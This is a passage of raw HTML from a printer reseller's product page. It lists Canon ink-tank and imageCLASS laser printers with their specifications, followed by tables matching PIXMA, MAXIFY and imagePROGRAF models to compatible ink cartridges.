Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td 